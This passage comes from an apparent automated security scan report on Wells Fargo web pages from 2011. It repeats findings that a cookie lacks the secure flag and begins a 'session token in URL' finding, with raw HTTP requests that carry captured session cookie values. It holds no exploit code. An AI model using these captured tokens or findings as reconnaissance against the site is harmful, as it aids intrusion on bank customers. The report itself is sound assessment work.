Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo - Apply for an Acc ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2197052170.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/brokerage_cklist HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en
Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/product ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1760844554.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/deposit_cklist HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist
Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2482264842.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/pll_select HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:56 GMT
Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select
Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2650037002.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rates/rates_viewall HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Content-length: 4031
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2415155978.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-length: 10180
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2096388874.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:37 GMT
Content-length: 11173
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open a Savings Account or CD</ ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2331269898.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/cds HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:37 GMT
Content-length: 11464
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>CD Account - Find the Best CD ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2549373706.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:02 GMT
Content-type: text/html; charset=utf-8
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2331269898.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:01 GMT
Content-length: 11525
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Sitemap</title> <meta name=" ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2230606602.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-length: 11102
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2180274954.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student/loans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:45 GMT
Location: https://www.wellsfargo.com/student/apply
Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/student ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2499042058.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /theprivatebank/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 10631
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2582928138.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2381601546.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2062834442.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/autoloans/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:12 GMT
Content-length: 4590
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2666814218.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/insurance HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:13 GMT Content-length: 5083 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1727290122.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/wealthmanagement/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 4878 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wachovia to Wells Fargo Inter ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2062834442.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wf/product/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT X-Cnection: close Location: https://www.wellsfargo.com:443/customerApp/product/apply Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure Content-Language: en Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com:443/cus ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2113166090.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wfonline/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 10682 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2582928138.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wfonline/bill_pay/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:32 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Online - Bill Pay< ...[SNIP]...
7. Session token in URL
There are 8 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /usa_atm/ HTTP/1.1 Host: visa.via.infonow.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.29 Set-Cookie: JSESSIONID=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1; Path=/usa_atm Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL', policyref="http://visa.via.infonow.net/w3c/p3p.xml" Content-Language: en-US Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 29339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
